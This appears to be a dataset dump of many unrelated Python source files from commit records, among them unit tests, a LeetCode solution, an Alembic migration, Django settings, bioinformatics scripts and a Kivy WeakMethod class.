dba.c.execute.return_value = []
self.assertEqual(dba.check_room('MS160', 'M'), [])
dba.c.execute.return_value = [(0, 25), (25, 50), (50, 75), (75, 100)]
self.assertEqual(dba.check_room('MS160', 'M'), [('00:00', '01:00')])
dba.c.execute.return_value = [(0, 25), (25, 50), (75, 100), (100, 125)]
self.assertEqual(dba.check_room('MS160', 'M'),
[('00:00', '00:30'), ('00:45', '01:15')])
dba.c.execute.return_value = [(0, 25), (50, 75), (100, 125)]
self.assertEqual(dba.check_room('MS160', 'M'),
[('00:00', '00:15'), ('00:30', '00:45'), ('01:00', '01:15')])
@patch('dbadmin.DBAdmin.conn', new_callable=PropertyMock)
@patch('dbadmin.DBAdmin.c', new_callable=PropertyMock)
def testFindRoom(self, *unused_args):
dba = dbadmin.DBAdmin()
dba.c.execute.return_value = []
self.assertEqual(dba.find_room('M', '00:00', '00:15'), {})
dba.c.execute.return_value = [('MS160', 0), ('MS160', 25), ('MS160', 50)]
self.assertEqual(dba.find_room('M', '00:00', '00:15'), {'MS160':[(0, 75)]})
dba.c.execute.return_value = [('MS160', 0), ('MS160', 25), ('MS160', 50)]
self.assertEqual(dba.find_room('M', '00:00'), {})
dba.c.execute.return_value = [('MS160', 0), ('MS160', 25), ('MS160', 50)]
self.assertEqual(dba.find_room('M', end='24:00'), {})
if __name__ == '__main__':
unittest.main()
| Python | 0 | |
f68b1a9d5aa2c36f9301588a55bc217a9ed120c1 | Create PowerofThree_001.py | leetcode/326-Power-of-Three/PowerofThree_001.py | leetcode/326-Power-of-Three/PowerofThree_001.py | class Solution(object):
def isPowerOfThree(self, n):
"""
:type n: int
:rtype: bool
"""
return n > 0 and 3 ** round(math.log(n, 3)) == n
| Python | 0.000002 | |
6c00711a5440fe958691c8064227565461e0acdf | add tools for laa analysis | sequana/laa.py | sequana/laa.py | from sequana import BAM
import glob
import pandas as pd
import pylab
class LAA():
def __init__(self, where="bc*"):
self.filenames = glob.glob(where + "/" + "amplicon_*summary.csv")
self.data = [pd.read_csv(this) for this in self.filenames]
def hist_amplicon(self, fontsize=12):
data = [len(x) for x in self.data]
pylab.hist(data, bins=max(data), ec="k")
pylab.ylabel("#", fontsize=fontsize)
pylab.ylabel("Number of amplicons per barcode", fontsize=fontsize)
class LAA_Assembly():
"""
Input is a SAM/BAM from the mapping of amplicon onto a known reference.
Based on the position, we can construct the new reference.
"""
def __init__(self, filename):
self.bam = BAM(filename)
def build_reference(self):
self.bam.reset()
# scan BAM file assuming it is small
aa = [a for a in self.bam]
# retrieve data of interest
data = [(a.pos, {
"name":a.query_name,
"sequence": a.query_sequence,
"cigar": a.cigarstring,
"position": a.pos,
"qstart": a.qstart,
"qend": a.qend}) for a in aa]
# sort by starting position
data.sort(key=lambda x: x[0])
for i, read in enumerate(data):
read = read[1]
if i == 0:
sequence = read["sequence"] # 2 is query_sequence
else:
pr = data[i-1][1] # previous read
L = len(pr["sequence"])
end_position_pr = pr['position'] - pr['qstart'] + L
# overlap between previous read and this one
overlap = end_position_pr - (read['position'] - read['qstart']) +0
print(overlap)
print(pr['position'], pr['qstart'], L, end_position_pr)
print(read['position'], read['qstart'])
sequence = sequence + read["sequence"][overlap+1:]
# argmax([sum(a==b for a,b in zip(X[-i:] , Y[:i]))/float(i+1) for i in range(1000)])
return sequence
def save_fasta(self, filename, sequence=None):
if sequence is None:
sequence = self.build_reference()
with open(filename, "w") as fout:
fout.write(">test\n{}".format(sequence))
| Python | 0 | |
bbbe3b7d79d57e350b1203a636b6ea64fe818caa | Update migration chain | src/ggrc/migrations/versions/20160421141928_1257140cbce5_delete_responses_table.py | src/ggrc/migrations/versions/20160421141928_1257140cbce5_delete_responses_table.py | # Copyright (C) 2016 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: goodson@google.com
# Maintained By: goodson@google.com
"""Delete responses table and any other references to responses
Create Date: 2016-04-21 14:19:28.527745
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = '1257140cbce5'
down_revision = '5599d1769f25'
def upgrade():
"""Upgrade database schema and/or data, creating a new revision."""
op.drop_constraint('meetings_ibfk_3', 'meetings', type_='foreignkey')
op.drop_column('meetings', 'response_id')
op.drop_table('responses')
def downgrade():
"""Downgrade database schema and/or data back to the previous revision."""
op.create_table(
'responses',
sa.Column('title', sa.String(length=250), nullable=False),
sa.Column('request_id', sa.Integer(), nullable=False),
sa.Column(
'response_type',
sa.Enum(u'documentation', u'interview', u'population sample'),
nullable=False),
sa.Column('status', sa.String(length=250), nullable=False),
sa.Column('population_worksheet_id', sa.Integer(), nullable=False),
sa.Column('population_count', sa.Integer(), nullable=False),
sa.Column('sample_worksheet_id', sa.Integer(), nullable=False),
sa.Column('sample_count', sa.Integer(), nullable=False),
sa.Column('sample_evidence_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['request_id'], ['requests.id']),
sa.ForeignKeyConstraint(['population_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_worksheet_id'], ['documents.id']),
sa.ForeignKeyConstraint(['sample_evidence_id'], ['documents.id']),
sa.Index('population_worksheet_document', 'population_worksheet_id'),
sa.Index('sample_evidence_document', 'sample_evidence_id'),
sa.Index('sample_worksheet_document', 'sample_worksheet_id')
)
op.add_column(
'meetings', sa.Column('response_id', sa.Integer(), nullable=False))
op.create_foreign_key(
'meetings_ibfk_3', 'meetings', 'responses', ['response_id'], ['id'])
| # Copyright (C) 2016 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: dan@reciprocitylabs.com
# Maintained By: peter@reciprocitylabs.com
"""Delete responses table and any other references to responses
Create Date: 2016-04-21 14:19:28.527745
"""
# disable Invalid constant name pylint warning for mandatory Alembic variables.
# pylint: disable=invalid-name
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = '1257140cbce5'
down_revision = '33459bd8b70d'
def upgrade():
    """Upgrade database schema and/or data, creating a new revision."""
    # Order matters: drop the FK constraint before the column it covers,
    # and the referencing column before the referenced table.
    op.drop_constraint('meetings_ibfk_3', 'meetings', type_='foreignkey')
    op.drop_column('meetings', 'response_id')
    op.drop_table('responses')
def downgrade():
    """Downgrade database schema and/or data back to the previous revision."""
    # Recreate `responses` exactly as it existed before upgrade(), then
    # restore the FK column on `meetings` that referenced it.
    op.create_table(
        'responses',
        sa.Column('title', sa.String(length=250), nullable=False),
        sa.Column('request_id', sa.Integer(), nullable=False),
        sa.Column(
            'response_type',
            sa.Enum(u'documentation', u'interview', u'population sample'),
            nullable=False),
        sa.Column('status', sa.String(length=250), nullable=False),
        sa.Column('population_worksheet_id', sa.Integer(), nullable=False),
        sa.Column('population_count', sa.Integer(), nullable=False),
        sa.Column('sample_worksheet_id', sa.Integer(), nullable=False),
        sa.Column('sample_count', sa.Integer(), nullable=False),
        sa.Column('sample_evidence_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['request_id'], ['requests.id']),
        sa.ForeignKeyConstraint(['population_worksheet_id'], ['documents.id']),
        sa.ForeignKeyConstraint(['sample_worksheet_id'], ['documents.id']),
        sa.ForeignKeyConstraint(['sample_evidence_id'], ['documents.id']),
        sa.Index('population_worksheet_document', 'population_worksheet_id'),
        sa.Index('sample_evidence_document', 'sample_evidence_id'),
        sa.Index('sample_worksheet_document', 'sample_worksheet_id')
    )
    # NOTE(review): nullable=False on a re-added column will fail if any
    # meetings rows already exist -- confirm downgrade is only run on data
    # that still satisfies the constraint.
    op.add_column(
        'meetings', sa.Column('response_id', sa.Integer(), nullable=False))
    op.create_foreign_key(
        'meetings_ibfk_3', 'meetings', 'responses', ['response_id'], ['id'])
| Python | 0.000001 |
1d3327d8d804a6e53c020e69b77efbea2086379b | Add staging settings file | manchester_traffic_offences/settings/staging.py | manchester_traffic_offences/settings/staging.py | from .base import *
import os
DEBUG = False
TEMPLATE_DEBUG = DEBUG
INSTALLED_APPS += ('raven.contrib.django.raven_compat', )
RAVEN_CONFIG = {
'dsn': os.environ['RAVEN_DSN'],
}
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ['POSTGRES_DB'],
'USER': os.environ['POSTGRES_USER'],
'PASSWORD': os.environ.get('POSTGRES_PASS', ''),
'HOST': os.environ.get('POSTGRES_HOST', ''),
'PORT': os.environ.get('POSTGRES_PORT', ''),
}
}
ADMINS = (
('Ian George', 'ian.george@digital.justice.gov.uk'),
('Lyndon Garvey', 'lyndon.garvey@digital.justice.gov.uk')
)
MANAGERS = ADMINS
ALLOWED_HOSTS = ["staging.makeaplea.justice.gov.uk", ]
SESSION_COOKIE_SECURE = True
# Emails
SMTP_ROUTES["GSI"]["HOST"] = os.environ.get('GSI_EMAIL_HOST', '')
SMTP_ROUTES["GSI"]["PORT"] = int(os.environ.get('GSI_EMAIL_PORT', '25'))
EMAIL_HOST = os.environ.get('EMAIL_HOST', 'email-smtp.eu-west-1.amazonaws.com')
EMAIL_PORT = int(os.environ.get('EMAIL_PORT', '587'))
EMAIL_HOST_USER = os.environ['EMAIL_HOST_USERNAME']
EMAIL_HOST_PASSWORD = os.environ['EMAIL_HOST_PASSWORD']
EMAIL_USE_TLS = True
PLEA_EMAIL_FROM = os.environ['PLEA_EMAIL_FROM']
PLEA_EMAIL_TO = [os.environ['PLEA_EMAIL_TO'], ]
PLP_EMAIL_TO = [os.environ["PLP_EMAIL_TO"], ]
FEEDBACK_EMAIL_TO = [os.environ["FEEDBACK_EMAIL_TO"], ]
FEEDBACK_EMAIL_FROM = os.environ["FEEDBACK_EMAIL_FROM"]
| Python | 0 | |
0d2520001a0666114f9a977f6a5dc2d3ed640464 | Create parse.py | BS-seq_oxBS-seq_fixed_parameters/parse.py | BS-seq_oxBS-seq_fixed_parameters/parse.py | #!/usr/bin/env python
import sys
import os
import numpy
import scipy.stats
import scipy.special
import argparse
def generate_output_files(data_file, prior_file, bsEff, bsBEff, oxEff, seqErr, prefix):
    """Write Lux input files <prefix>_data.R and <prefix>_init.R in R dump format.

    data_file   -- tab-separated file with 4 columns per replicate
                   (bsC, bsTot, oxC, oxTot counts per noncontrol cytosine)
    prior_file  -- tab-separated file with exactly 3 columns giving the
                   Dirichlet prior for each noncontrol cytosine
    bsEff, bsBEff, oxEff, seqErr -- per-replicate experimental parameters;
                   each list must have one value per replicate
    prefix      -- output file prefix

    Exits via sys.exit() with an error message on malformed input.
    """
    # hyperparameters of the Gamma prior for g
    g_a, g_b = 2, 2 / 6.0
    # read the input files
    data = numpy.loadtxt(data_file, delimiter='\t', skiprows=0, dtype='int')
    prior = numpy.loadtxt(prior_file, delimiter='\t', skiprows=0, dtype='float')
    # make sure that the arrays are 2-dimensional (loadtxt squeezes single rows)
    if len(data.shape) == 1:
        data = numpy.reshape(data, [1, len(data)])
    if len(prior.shape) == 1:
        prior = numpy.reshape(prior, [1, len(prior)])
    # Check that the files were in the right format.
    # Bug fix: sys.exit() takes a single argument; the original passed the
    # filename as a second argument, which raises a TypeError.
    if data.shape[1] % 4 != 0:
        sys.exit('error: the number of columns in %s is not divisible by four' % data_file)
    if prior.shape[1] != 3:
        sys.exit('error: there should be exactly three columns in %s' % prior_file)
    # number of replicates -- integer division so R stays an int on Python 3
    R = data.shape[1] // 4
    # number of noncontrol cytosines
    N = data.shape[0]
    if len(bsEff) != R or len(bsBEff) != R or len(oxEff) != R or len(seqErr) != R:
        sys.exit('error: supply experimental parameters for each replicate')
    # C and total read-outs for noncontrol cytosines in BS-seq and oxBS-seq
    bsC, bsTot, oxC, oxTot = data[:, 0::4], data[:, 1::4], data[:, 2::4], data[:, 3::4]
    bsEff = ','.join(map(str, bsEff))
    oxEff = ','.join(map(str, oxEff))
    bsBEff = ','.join(map(str, bsBEff))
    seqErr = ','.join(map(str, seqErr))

    def _r_vector(array):
        # Flatten column-major ('F') because R's structure() fills matrices
        # column by column; replaces the legacy numpy idiom flatten(1) which
        # modern numpy rejects.
        return ','.join(str(value) for value in array.flatten(order='F'))

    # print DATA
    with open(prefix + '_data.R', 'w') as f:
        f.write("bsEff <- c(%s)\noxEff <- c(%s)\nbsBEff <- c(%s)\nseqErr <- c(%s)\ng_a <- %f\ng_b <- %f\n" % (bsEff, oxEff, bsBEff, seqErr, g_a, g_b))
        f.write("N <- %d\nR <- %d\n" % (N, R))
        f.write("bsC <- structure(c(%s), .Dim=c(%d,%d))\n" % (_r_vector(bsC), N, R))
        f.write("bsTot <- structure(c(%s), .Dim=c(%d,%d))\n" % (_r_vector(bsTot), N, R))
        f.write("oxC <- structure(c(%s), .Dim=c(%d,%d))\n" % (_r_vector(oxC), N, R))
        f.write("oxTot <- structure(c(%s), .Dim=c(%d,%d))\n" % (_r_vector(oxTot), N, R))
        f.write("alpha <- structure(c(%s), .Dim=c(%d,%d))\n" % (_r_vector(prior), N, 3))
    # sample initial values from the priors
    g = [numpy.random.gamma(g_a, 1.0 / g_b) for x in range(0, N)]
    theta = _r_vector(numpy.array([numpy.random.dirichlet(row) for row in numpy.tile(prior, (R, 1))]))
    mu = _r_vector(numpy.array([numpy.random.dirichlet(row) for row in prior]))
    # print INIT
    with open(prefix + '_init.R', 'w') as f:
        f.write("g <- c(%s)\n" % (','.join(map(str, g))))
        f.write("theta <- structure(c(%s), .Dim=c(%d,%d,3))\n" % (theta, N, R))
        f.write("mu <- structure(c(%s), .Dim=c(%d,3))\n" % (mu, N))
if __name__ == '__main__':
    # Command-line front-end: collect the two input files, the per-replicate
    # experimental parameters and the output prefix, then write the dumps.
    parser = argparse.ArgumentParser(description='Generates data and init files in the dump format for Lux')
    parser.add_argument('-d','--data',action='store',dest='data',type=str,required=True,help='noncontrol cytosine data')
    parser.add_argument('-p','--prior',action='store',dest='prior',type=str,required=True,help='prior of the noncontrol cytosines')
    parser.add_argument('-b','--bseff',action='store',dest='bseff',type=float,nargs='+',required=True,help='bisulfite conversion efficiencies for each replicate')
    parser.add_argument('-i','--bsbeff',action='store',dest='bsbeff',type=float,nargs='+',required=True,help='inaccurate bisulfite conversion efficiencies for each replicate')
    parser.add_argument('-o','--oxeff',action='store',dest='oxeff',type=float,nargs='+',required=True,help='oxidation efficiencies for each replicate')
    parser.add_argument('-s','--seqerr',action='store',dest='seqerr',type=float,nargs='+',required=True,help='sequencies errors for each replicate')
    parser.add_argument('-pr','--prefix',action='store',dest='prefix',type=str,required=True,help='prefix of the output files')
    parser.add_argument('-v','--version',action='version',version='%(prog)s 0.666')
    options = parser.parse_args()
    # fail early if either input path does not point at an existing file
    if not os.path.isfile(options.data):
        sys.exit('error: %s is not a file'%(options.data))
    if not os.path.isfile(options.prior):
        sys.exit('error: %s is not a file'%(options.prior))
    generate_output_files(options.data,options.prior,options.bseff,options.bsbeff,options.oxeff,options.seqerr,options.prefix)
| Python | 0.00002 | |
a79a463624ab8bf62fe54d2392d4768c5a38626a | Add migration for removing challenge from Participant. (#203) | apps/participants/migrations/0003_remove_participant_challenge.py | apps/participants/migrations/0003_remove_participant_challenge.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-02 14:45
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the obsolete ``challenge`` field from the ``Participant`` model."""
    # Builds on the migration that introduced participant teams.
    dependencies = [
        ('participants', '0002_participantteam_participantteammember'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='participant',
            name='challenge',
        ),
    ]
| Python | 0 | |
d78b6c8d0efa3c4b29f254b7465e5e6fcb889395 | Initialize P1_multiplicationTable | books/AutomateTheBoringStuffWithPython/Chapter12/PracticeProjects/P1_multiplicationTable.py | books/AutomateTheBoringStuffWithPython/Chapter12/PracticeProjects/P1_multiplicationTable.py | # Create a program multiplicationTable.py that takes a number N from the
# command line and creates an N×N multiplication table in an Excel spreadsheet.
# Row 1 and column A should be used for labels and should be in bold.
| Python | 0.000405 | |
58cfcfbde61859a98b317f0498f35f7b7921e41b | Add dummy FileBrowseField | mezzanine_grappelli/filebrowser/fields.py | mezzanine_grappelli/filebrowser/fields.py | from filebrowser.fields import FileBrowseField as BaseFileBrowseField
class FileBrowseField(BaseFileBrowseField):
    """Thin subclass of django-filebrowser's ``FileBrowseField``.

    Adds no behaviour yet; it exists so project code imports the field from
    here, leaving room for local customisation later.
    """
    pass
| Python | 0 | |
775104979a8ee5be040ac830133e69ca848d1ce1 | add snpPriority.py, LD score and effect size weighted SNP scoring | snpPriority.py | snpPriority.py | '''
snpPriority.py - score SNPs based on their LD score and SE weighted effect sizes
===============================================================================
:Author: Mike Morgan
:Release: $Id$
:Date: |today|
:Tags: Python
Purpose
-------
.. Score SNPs based on their LD score and SE weighted effect sizes from
association analysis.
Usage
-----
.. Example use case
Example::
python snpPriority.py
Type::
python snpPriority.py --help
for command line help.
Command line options
--------------------
'''
import sys
import CGAT.Experiment as E
import PipelineGWAS as gwas
import re
import pandas as pd
def main(argv=None):
    """script main.

    Parses command line options in sys.argv, unless *argv* is given, then
    scores SNPs (LD- and SE-weighted) and writes the result to stdout.
    """
    if argv is None:
        argv = sys.argv
    # setup command line parser
    parser = E.OptionParser(version="%prog version: $Id$",
                            usage=globals()["__doc__"])
    parser.add_option("--database", dest="database", type="string",
                      help="SQL database containing LD information "
                      "in table format. Expects columns SNP_A, "
                      "SNP_B, R2, BP_A and BP_B (Plink --r2 output)")
    parser.add_option("--table-name", dest="table", type="string",
                      help="name of the SQL table containing the LD"
                      "values")
    parser.add_option("--chromosome", dest="chromosome", type="string",
                      help="chromosome to subset the association results "
                      "file on")
    # add common options (-h/--help, ...) and parse command line
    (options, args) = E.Start(parser, argv=argv)
    infile = argv[-1]
    # Sniff the first few rows to decide whether the results file is already
    # "clean", i.e. contains only additive-model ("ADD") test rows.
    peek = pd.read_table(infile, nrows=5, sep=None, header=0)
    # Bug fix: the original tested len(peek["TEST"] != "ADD"), which is just
    # the number of sampled rows and therefore truthy for any non-empty file,
    # so clean was effectively always False.  Test whether any row's TEST
    # value differs from "ADD" instead.
    clean = not (peek["TEST"] != "ADD").any()
    snpscores = gwas.snpPriorityScore(gwas_results=infile,
                                      database=options.database,
                                      table_name=options.table,
                                      chromosome=options.chromosome,
                                      clean=clean)
    snpscores.to_csv(options.stdout, index_label="SNP",
                     sep="\t")
    # write footer and output benchmark information.
    E.Stop()
if __name__ == "__main__":
    sys.exit(main(sys.argv))
| Python | 0 | |
80d579bd9376d955eab4a431fb3bcb493518582a | Create __init__.py | kernel/__init__.py | kernel/__init__.py | Python | 0.000429 | ||
6deb5c1f2f614e6e6cb420c56c250a27fa032c8b | Add undelete script | bin/undelete.py | bin/undelete.py | #!/usr/bin/env python
"""
Remove the `deleted` tag from containers (recursively) or from individual files.
"""
import argparse
import logging
import sys
import bson
from api import config
from api.dao.containerutil import propagate_changes
log = logging.getLogger('scitran.undelete')
def main():
    """Parse CLI args and clear the ``deleted`` flag on a container or file.

    For a container the tag is removed from the container itself and
    propagated recursively to its children; for a single file only that
    file's entry inside the container document is updated.
    """
    cont_names = ['projects', 'sessions', 'acquisitions', 'analyses']
    cont_names_str = '|'.join(cont_names)
    ap = argparse.ArgumentParser(description=sys.modules[__name__].__doc__)
    ap.add_argument('cont_name', help='container name to undelete {}'.format(cont_names_str))
    ap.add_argument('cont_id', help='container id to undelete (bson.ObjectId)')
    ap.add_argument('filename', nargs='?', help='filename within container (string, optional)')
    # With no CLI arguments at all, show the help text instead of failing.
    args = ap.parse_args(sys.argv[1:] or ['--help'])
    if args.cont_name not in cont_names:
        raise ValueError('Invalid cont_name "{}" (must be one of {})'.format(args.cont_name, cont_names_str))
    if not bson.ObjectId.is_valid(args.cont_id):
        raise ValueError('Invalid cont_id "{}"'.format(args.cont_id))
    args.cont_id = bson.ObjectId(args.cont_id)
    query = {'_id': args.cont_id}
    collection = config.db[args.cont_name]
    container = collection.find_one(query)
    if container is None:
        raise RuntimeError('Cannot find {}/{}'.format(args.cont_name, args.cont_id))
    # $unset removes the key entirely, restoring the pre-deletion shape.
    update = {'$unset': {'deleted': True}}
    if args.filename is None:
        log.info('Removing "deleted" tag from {}/{}...'.format(args.cont_name, args.cont_id))
        collection.update_one(query, update)
        log.info('Removing "deleted" tag from child containers recursively...')
        propagate_changes(args.cont_name, args.cont_id, None, update, include_refs=True)
    else:
        log.info('Removing "deleted" tag from file {}/{}/{}...'.format(args.cont_name, args.cont_id, args.filename))
        # Find the matching file entry and drop its `deleted` key in place.
        for f in container.get('files', []):
            if f['name'] == args.filename:
                del f['deleted']
                break
        else:
            # for/else: no file with that name exists in the container
            raise RuntimeError('Cannot find {}/{}/{}'.format(args.cont_name, args.cont_id, args.filename))
        collection.update_one(query, {'$set': {'files': container['files']}})
    log.info('Done.')
if __name__ == '__main__':
    try:
        main()
    except (ValueError, RuntimeError) as exc:
        # Print a clean error (no traceback) and signal failure to the shell.
        # NOTE(review): exc.message is Python 2 only; str(exc) would be portable.
        log.error(exc.message)
        sys.exit(1)
| Python | 0.000001 | |
32f29eac0582e73bc17b774a98891d11de760458 | use different implementation for weakmethod, much easier to understand. | kivy/weakmethod.py | kivy/weakmethod.py | '''
Weak Method
===========
:class:`WeakMethod` is used in Clock class to prevent the clock from taking
memory if the object is deleted. Check examples/core/clock_method.py for more
information.
This WeakMethod class is taken from the recipe
http://code.activestate.com/recipes/81253/, based on the nicodemus version.
(thanks to him !)
'''
import weakref
import sys
if sys.version > '3':
    # NOTE(review): string comparison against '3' selects the implementation;
    # sys.version_info would be the robust check.
    class WeakMethod:
        '''Implementation of weakref for function and bounded method.
        '''
        def __init__(self, method):
            # Bound method: keep a weak proxy to the instance plus the method
            # name.  Plain function (AttributeError path): keep a strong
            # reference to the callable itself.
            try:
                if method.__self__ is not None:
                    self.method_name = method.__func__.__name__
                    self.proxy = weakref.proxy(method.__self__)
                else:
                    self.method = method
                    self.proxy = None
            except AttributeError:
                self.proxy = None
                self.method = method
        def __call__(self, *args):
            '''Return a new bound-method like the original, or the
            original function if refers just to a function or unbound
            method.
            Returns None if the original object doesn't exist
            '''
            # NOTE(review): the proxy branch *calls* the method and returns
            # its result, while the plain-function branch returns the callable
            # uncalled -- confirm this asymmetry is intended by callers.
            if self.proxy:
                return getattr(self.proxy, self.method_name)(*args)
            return self.method
        def is_dead(self):
            '''Returns True if the referenced callable was a bound method and
            the instance no longer exists. Otherwise, return False.
            '''
            # NOTE(review): dir() on a *live* proxy is non-empty, so this
            # returns True while the referent is still alive -- the logic
            # looks inverted relative to the docstring; verify.
            return self.proxy is not None and bool(dir(self.proxy))
else:
    import new
    class WeakMethod(object):
        '''Implementation of weakref for function and bounded method.
        '''
        def __init__(self, method):
            try:
                if method.__self__ is not None:
                    # bound method
                    self._obj = weakref.ref(method.im_self)
                else:
                    # unbound method
                    self._obj = None
                self._func = method.im_func
                self._class = method.im_class
            except AttributeError:
                # not a method
                self._obj = None
                self._func = method
                self._class = None
        def __call__(self):
            '''Return a new bound-method like the original, or the
            original function if refers just to a function or unbound
            method.
            Returns None if the original object doesn't exist
            '''
            if self.is_dead():
                return None
            if self._obj is not None:
                # rebind the stored function to the (still live) instance
                return new.instancemethod(self._func, self._obj(), self._class)
            else:
                # we don't have an instance: return just the function
                return self._func
        def is_dead(self):
            '''Returns True if the referenced callable was a bound method and
            the instance no longer exists. Otherwise, return False.
            '''
            return self._obj is not None and self._obj() is None
        def __eq__(self, other):
            try:
                return type(self) is type(other) and self() == other()
            except:
                return False
        def __ne__(self, other):
            return not self == other
| '''
Weak Method
===========
:class:`WeakMethod` is used in Clock class to prevent the clock from taking
memory if the object is deleted. Check examples/core/clock_method.py for more
information.
This WeakMethod class is taken from the recipe
http://code.activestate.com/recipes/81253/, based on the nicodemus version.
(thanks to him !)
'''
import weakref
class WeakMethod(object):
    '''Weak reference to a function or bound method.

    Holds only a weak reference to a bound method's instance, so keeping a
    WeakMethod does not keep the instance alive.  Calling the WeakMethod
    object returns a fresh bound method (or the plain function), or None
    once the instance has been garbage collected.
    '''

    def __init__(self, method):
        try:
            if method.__self__ is not None:
                # bound method: weakly reference the instance
                self._obj = weakref.ref(method.__self__)
            else:
                # unbound method
                self._obj = None
            self._func = method.__func__
            self._class = method.__self__.__class__
        except AttributeError:
            # not a method: keep a strong reference to the plain callable
            self._obj = None
            self._func = method
            self._class = None

    def __call__(self):
        '''Return a new bound-method like the original, or the
        original function if refers just to a function or unbound
        method.
        Returns None if the original object doesn't exist
        '''
        if self.is_dead():
            return None
        if self._obj is not None:
            # we have an instance: return a bound method
            o = self._obj()
            # Bug fix: the attribute is _func; the original referenced
            # self.func, which raised AttributeError on every call.
            return self._func.__get__(o, o.__class__)
        else:
            # we don't have an instance: return just the function
            return self._func

    def is_dead(self):
        '''Returns True if the referenced callable was a bound method and
        the instance no longer exists. Otherwise, return False.
        '''
        return self._obj is not None and self._obj() is None

    def __eq__(self, other):
        try:
            return type(self) is type(other) and self() == other()
        except:
            return False

    def __ne__(self, other):
        return not self == other
| Python | 0 |
d0cb340a874cc0430c8b77a0af052d8f2fd4d8c3 | test script to cache Genewiki content | scheduled_bots/cache/genes/getWDHumanGenes.py | scheduled_bots/cache/genes/getWDHumanGenes.py | from wikidataintegrator import wdi_core
import pandas as pd
from rdflib import Graph
import time
import sys
query = """
SELECT * WHERE {
?item wdt:P31 wd:Q7187 ;
wdt:P703 wd:Q15978631 .
}
"""
kg = Graph()
results = wdi_core.WDItemEngine.execute_sparql_query(query)
i =0
for qid in results["results"]["bindings"]:
try:
# print(qid["item"]["value"].replace("http://www.wikidata.org/entity/", ""))
kg.parse(qid["item"]["value"]+".ttl")
i+=1
print(i)
except:
print(print(qid["item"]["value"].replace("http://www.wikidata.org/entity/", "")))
time.sleep(5)
kg.serialize(destination="diseases.ttl", format="turtle") | Python | 0 | |
4f2df78c7d8a9621340ff4ee5cfc6f22548d26d5 | add TracedThread that continues the context propagation | proposal/helpers.py | proposal/helpers.py | """Helpers that are used in examples. In the current state, we may not require
to put these classes and functions as part of the main proposal.
"""
from threading import Thread
from proposal import tracer
class TracedThread(Thread):
    """Helper class OpenTracing-aware, that continues the propagation of
    the current ActiveSpan in a new thread using an internal wrapper.
    """
    def __init__(self, *args, **kwargs):
        # implementation detail
        # get the ActiveSpan when we're in the "parent" thread
        # Note: __init__ runs in the *parent* thread, so the span captured
        # here is the parent's active span at construction time, not at
        # start() time.
        self._active_span = tracer.active_span_source.active_span()
        super(TracedThread, self).__init__(*args, **kwargs)
    def run(self):
        # implementation detail
        # set the ActiveSpan in this thread and remove the local reference
        # (deleting the attribute avoids keeping the span alive for the
        # whole lifetime of the thread object)
        tracer.active_span_source.make_active(self._active_span)
        del self._active_span
        super(TracedThread, self).run()
| Python | 0 | |
8f1beddb8e3d1a63df10fcde9d3faae0d8d11171 | Add kodi_automation.py | kodi_automation.py | kodi_automation.py |
import sys
import argparse
def Classification(paths):
  # Split `paths` into (movie_paths, episodes).  Placeholder implementation:
  # classifies nothing and returns two empty lists.
  return ([], [])
def MoveMoveFile(path, movies_dir, dry_run=False):
  """Move a movie file at `path` into `movies_dir`.

  Only the dry-run branch is implemented so far; it logs the intended move.
  Bug fix: sys.stderr.write() accepts a single string, so the message is now
  formatted first instead of being passed as two positional arguments
  (which raised a TypeError).
  """
  if dry_run:
    sys.stderr.write('Moving movie %s to %s\n' % (path, movies_dir))
    return
def MoveEpisodeFile(path, seria, season, episode, series_dir, dry_run=False):
  """Move an episode file into `series_dir` under its series/season.

  Only the dry-run branch is implemented so far; it logs the intended move.
  Bug fix: the original wrote sys.stderr.write('Moving episode', *args),
  which raised NameError (`args` was never defined) and passed multiple
  arguments to write(); the message is now a single formatted string.
  """
  if dry_run:
    sys.stderr.write('Moving episode %s as %s S%s E%s to %s\n'
                     % (path, seria, season, episode, series_dir))
    return
def main():
  # Scan a directory for new video files and sort them into the movies and
  # series directories (this file is Python 2: note the print statements).
  parser = argparse.ArgumentParser()
  parser.add_argument('--scan-dir', '-s', dest='scan_dir', default=None)
  parser.add_argument('--movies-dir', dest='movies_dir', default=None)
  parser.add_argument('--series-dir', dest='series_dir', default=None)
  parser.add_argument('--video-exts', '-v', dest='video_exts',
                      default='mkv,avi,mp4')
  parser.add_argument('--dry-run', dest='dry_run', default=False)
  args = parser.parse_args()
  video_exts = args.video_exts.split(',')
  # NOTE(review): ScanDir is not defined in this file -- presumably it lists
  # files under scan_dir; confirm where it comes from.
  new_paths = ScanDir(args.scan_dir)
  new_paths = [path for path in new_paths if any(path.endswith(ext) for ext in video_exts)]
  # NOTE(review): this calls Clasification but the function above is spelled
  # Classification -- looks like a typo to fix.
  movies_paths, episodes = Clasification(new_paths)
  for movie_path in movies_paths:
    # NOTE(review): prints `path`, which is undefined here; movie_path
    # appears intended.
    print 'Moving', path, 'to', args.movies_dir
    MoveMoveFile(movie_path, args.movies_dir, dry_run=args.dry_run)
  for episode in episodes:
    print 'Moving', episode.path, 'as', episode.seria, 'S', episode.season, 'E', episode.episode, 'to', args.series_dir
    MoveEpisodeFile(
        episode.path, episode.seria, episode.season, episode.episode,
        args.series_dir, dry_run=args.dry_run)
if __name__ == '__main__':
  main()
| Python | 0.00001 | |
d1ca3e7363b835aeca7be2fa00cd7083d9fc8c08 | Create divide_by_year.py | pipeline/preprocessing/google/divide_by_year.py | pipeline/preprocessing/google/divide_by_year.py | import glob
import gzip
import codecs
import re
import sys
import os
with_pos = False
targets = {}
my_buffer = {}
def flush(a_buffer, some_targets, a_year):
    """Write every buffered line for *a_year* to its output file, then empty
    that year's buffer in place."""
    out = some_targets[a_year]
